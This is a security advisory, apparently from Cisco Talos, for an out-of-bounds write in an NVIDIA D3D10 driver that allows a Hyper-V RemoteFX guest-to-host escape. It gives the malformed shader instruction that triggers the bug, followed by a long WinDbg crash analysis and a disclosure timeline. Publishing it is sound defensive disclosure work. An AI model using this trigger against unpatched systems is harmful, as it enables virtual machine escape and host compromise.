CVE‑2020‑5981
An exploitable code execution vulnerability exists in the nvwg MUL functionality of NVIDIA D3D10 Driver Version 442.50 - 26.21.14.4250. A specially crafted shader can cause remote code execution. An attacker can use this vulnerability to guest-to-host escape (through Hyper-V RemoteFX).
NVIDIA D3D10 Driver Version 442.50 - 26.21.14.4250
8.5 - CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H
CWE-787 - Out-of-bounds Write
NVIDIA Graphics drivers is software for NVIDIA Graphics GPU installed on the PC. It is used to communicate between the operating system and the GPU device. This software is required in most cases for the hardware device to function properly.
This vulnerability can be triggered by supplying a malformed compute shader. This leads to a memory corruption problem in the NVIDIA driver (this driver is mapped to the application - like Hyper-V (rdvgm.exe).
by modifying the following instruction: mul r2.w, r2.w, l(66.73)
to the following one (modifying the register number to negative one): mul r-2048691710.w, r2.w, l(66.73)
it is possible to trigger a memory corruption vulnerability in NVIDIA drivers.
0:105> r
rax=0000000000000000 rbx=00000206236e0bb0 rcx=000002461c5ad560
rdx=000000d9d909ec40 rsi=00000000ffe37202 rdi=0000000000000008
rip=00007ffb9e2bdff8 rsp=000000d9d909eba8 rbp=000000d9d909ecb0
r8=0000000000000000 r9=00000000000000ff r10=0000000000000008
r11=0000000000000008 r12=0000000000000002 r13=0000000000000001
r14=00000206237e54e0 r15=0000020622fc5f00
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
nvwgf2umx_cfg!OpenAdapter12+0x17aba8:
00007ffb`9e2bdff8 48894130 mov qword ptr [rcx+30h],rax ds:00000246`1c5ad590=????????????????
stack trace:
0:105> kb
# RetAddr : Args to Child : Call Site
00 00007ffb`9e2bd6e6 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x17aba8
01 00007ffb`9e159456 : 00000206`7c3c7850 00000206`75883420 00000206`7f655500 00000206`75883420 : nvwgf2umx_cfg!OpenAdapter12+0x17a296
02 00007ffb`9e15a232 : 00000000`00000000 00000206`75883420 00000000`00000000 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x16006
03 00007ffb`9e15b826 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x16de2
04 00007ffb`9e3f978d : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x183d6
05 00007ffb`9e46a84d : 00000206`232576c0 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x2b633d
06 00007ffb`9f2fc500 : 00000000`00000000 00000000`00000000 00000206`7fc99d00 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x3273fd
07 00007ffb`ad127bd4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx_cfg!NVAPI_Thunk+0x7cb5d0
08 00007ffb`aed8ced1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
09 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
0:105> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
KEY_VALUES_STRING: 1
Key : AV.Fault
Value: Write
Key : Timeline.OS.Boot.DeltaSec
Value: 28799
Key : Timeline.Process.Start.DeltaSec
Value: 4006
PROCESSES_ANALYSIS: 1
SERVICE_ANALYSIS: 1
STACKHASH_ANALYSIS: 1
TIMELINE_ANALYSIS: 1
Timeline: !analyze.Start
Name: <blank>
Time: 2020-03-16T18:44:12.543Z
Diff: 543 mSec
Timeline: Dump.Current
Name: <blank>
Time: 2020-03-16T18:44:12.0Z
Diff: 0 mSec
Timeline: Process.Start
Name: <blank>
Time: 2020-03-16T17:37:26.0Z
Diff: 4006000 mSec
Timeline: OS.Boot
Name: <blank>
Time: 2020-03-16T10:44:13.0Z
Diff: 28799000 mSec
DUMP_CLASS: 2
DUMP_QUALIFIER: 0
FAULTING_IP:
nvwgf2umx_cfg!OpenAdapter12+17aba8
00007ffb`9e2bdff8 48894130 mov qword ptr [rcx+30h],rax
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 00007ffb9e2bdff8 (nvwgf2umx_cfg!OpenAdapter12+0x000000000017aba8)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 0000000000000001
Parameter[1]: 000002461c5ad590
Attempt to write to address 000002461c5ad590
FAULTING_THREAD: 00001c28
PROCESS_NAME: rdvgm.exe
FOLLOWUP_IP:
nvwgf2umx_cfg!OpenAdapter12+17aba8
00007ffb`9e2bdff8 48894130 mov qword ptr [rcx+30h],rax
WRITE_ADDRESS: 000002461c5ad590
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE_STR: c0000005
EXCEPTION_PARAMETER1: 0000000000000001
EXCEPTION_PARAMETER2: 000002461c5ad590
WATSON_BKT_PROCSTAMP: c2ed11f1
WATSON_BKT_PROCVER: 10.0.18362.693
PROCESS_VER_PRODUCT: Microsoft® Windows® Operating System
WATSON_BKT_MODULE: nvwgf2umx_cfg.dll
WATSON_BKT_MODSTAMP: 5e543369
WATSON_BKT_MODOFFSET: 30dff8
WATSON_BKT_MODVER: 26.21.14.4250
MODULE_VER_PRODUCT: NVIDIA D3D10 drivers
BUILD_VERSION_STRING: 18362.1.amd64fre.19h1_release.190318-1202
MODLIST_WITH_TSCHKSUM_HASH: 622081de292639ef2eb530c827e84fc0b54d4fa4
MODLIST_SHA1_HASH: 066d72a0d47d3b063c2d64e78e469c18b0411eb3
NTGLOBALFLAG: 400
PROCESS_BAM_CURRENT_THROTTLED: 0
PROCESS_BAM_PREVIOUS_THROTTLED: 0
APPLICATION_VERIFIER_FLAGS: 0
PRODUCT_TYPE: 1
SUITE_MASK: 272
DUMP_TYPE: fe
ANALYSIS_SESSION_HOST: CLAB
ANALYSIS_SESSION_TIME: 03-16-2020 19:44:12.0543
ANALYSIS_VERSION: 10.0.18362.1 amd64fre
THREAD_ATTRIBUTES:
OS_LOCALE: PLK
BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_EXPLOITABLE
DEFAULT_BUCKET_ID: INVALID_POINTER_WRITE_EXPLOITABLE
PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT
PROBLEM_CLASSES:
ID: [0n313]
Type: [@ACCESS_VIOLATION]
Class: Addendum
Scope: BUCKET_ID
Name: Omit
Data: Omit
PID: [Unspecified]
TID: [0x1c28]
Frame: [0] : nvwgf2umx_cfg!OpenAdapter12
ID: [0n286]
Type: [INVALID_POINTER_WRITE]
Class: Primary
Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
BUCKET_ID
Name: Add
Data: Omit
PID: [Unspecified]
TID: [0x1c28]
Frame: [0] : nvwgf2umx_cfg!OpenAdapter12
ID: [0n117]
Type: [EXPLOITABLE]
Class: Addendum
Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
BUCKET_ID
Name: Add
Data: Omit
PID: [0x3b4c]
TID: [0x1c28]
Frame: [0] : nvwgf2umx_cfg!OpenAdapter12
LAST_CONTROL_TRANSFER: from 00007ffb9e2bd6e6 to 00007ffb9e2bdff8
STACK_TEXT:
000000d9`d909eba8 00007ffb`9e2bd6e6 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x17aba8
000000d9`d909ebb0 00007ffb`9e159456 : 00000206`7c3c7850 00000206`75883420 00000206`7f655500 00000206`75883420 : nvwgf2umx_cfg!OpenAdapter12+0x17a296
000000d9`d909ed60 00007ffb`9e15a232 : 00000000`00000000 00000206`75883420 00000000`00000000 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x16006
000000d9`d909eef0 00007ffb`9e15b826 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x16de2
000000d9`d909eff0 00007ffb`9e3f978d : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x183d6
000000d9`d909fa80 00007ffb`9e46a84d : 00000206`232576c0 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x2b633d
000000d9`d909fb70 00007ffb`9f2fc500 : 00000000`00000000 00000000`00000000 00000206`7fc99d00 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x3273fd
000000d9`d909fbc0 00007ffb`ad127bd4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nvwgf2umx_cfg!NVAPI_Thunk+0x7cb5d0
000000d9`d909fbf0 00007ffb`aed8ced1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
000000d9`d909fc20 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
THREAD_SHA1_HASH_MOD_FUNC: 8016138a2a39cc33d8dac8a84b1c2a1effc346be
THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 8554a8cb2835306423b02b0892307f8eca51ea16
THREAD_SHA1_HASH_MOD: 003810612d6ab3b00a71ed5b91e0c10272be87ae
FAULT_INSTR_CODE: 30418948
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: nvwgf2umx_cfg!OpenAdapter12+17aba8
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: nvwgf2umx_cfg
IMAGE_NAME: nvwgf2umx_cfg.dll
DEBUG_FLR_IMAGE_TIMESTAMP: 5e543369
STACK_COMMAND: ~105s ; .cxr ; kb
FAILURE_BUCKET_ID: INVALID_POINTER_WRITE_EXPLOITABLE_c0000005_nvwgf2umx_cfg.dll!OpenAdapter12
BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_WRITE_EXPLOITABLE_nvwgf2umx_cfg!OpenAdapter12+17aba8
FAILURE_EXCEPTION_CODE: c0000005
FAILURE_IMAGE_NAME: nvwgf2umx_cfg.dll
BUCKET_ID_IMAGE_STR: nvwgf2umx_cfg.dll
FAILURE_MODULE_NAME: nvwgf2umx_cfg
BUCKET_ID_MODULE_STR: nvwgf2umx_cfg
FAILURE_FUNCTION_NAME: OpenAdapter12
BUCKET_ID_FUNCTION_STR: OpenAdapter12
BUCKET_ID_OFFSET: 17aba8
BUCKET_ID_MODPRIVATE: 1
BUCKET_ID_MODTIMEDATESTAMP: 5e543369
BUCKET_ID_MODCHECKSUM: 272ca91
BUCKET_ID_MODVER_STR: 26.21.14.4250
BUCKET_ID_PREFIX_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_EXPLOITABLE_
FAILURE_PROBLEM_CLASS: APPLICATION_FAULT
FAILURE_SYMBOL_NAME: nvwgf2umx_cfg.dll!OpenAdapter12
WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/rdvgm.exe/10.0.18362.693/c2ed11f1/nvwgf2umx_cfg.dll/26.21.14.4250/5e543369/c0000005/0030dff8.htm?Retriage=1
TARGET_TIME: 2020-03-16T18:44:17.000Z
OSBUILD: 18363
OSSERVICEPACK: 329
SERVICEPACK_NUMBER: 0
OS_REVISION: 0
OSPLATFORM_TYPE: x64
OSNAME: Windows 10
OSEDITION: Windows 10 WinNt SingleUserTS
USER_LCID: 0
OSBUILD_TIMESTAMP: unknown_date
BUILDDATESTAMP_STR: 190318-1202
BUILDLAB_STR: 19h1_release
BUILDOSVER_STR: 10.0.18362.1.amd64fre.19h1_release.190318-1202
ANALYSIS_SESSION_ELAPSED_TIME: 11ae
ANALYSIS_SOURCE: UM
FAILURE_ID_HASH_STRING: um:invalid_pointer_write_exploitable_c0000005_nvwgf2umx_cfg.dll!openadapter12
FAILURE_ID_HASH: {32968bfd-cb9d-86c1-30b8-ad1954eb9190}
Followup: MachineOwner
---------
2020-03-25 - Vendor Disclosure
2020-04-06 - Vendor requested disclosure extension; Talos granted extension
2020-08-25 - Discussion w/vendor regarding CVE assignment
2020-09-30 - Public Release
Discovered by Piotr Bania of Cisco Talos.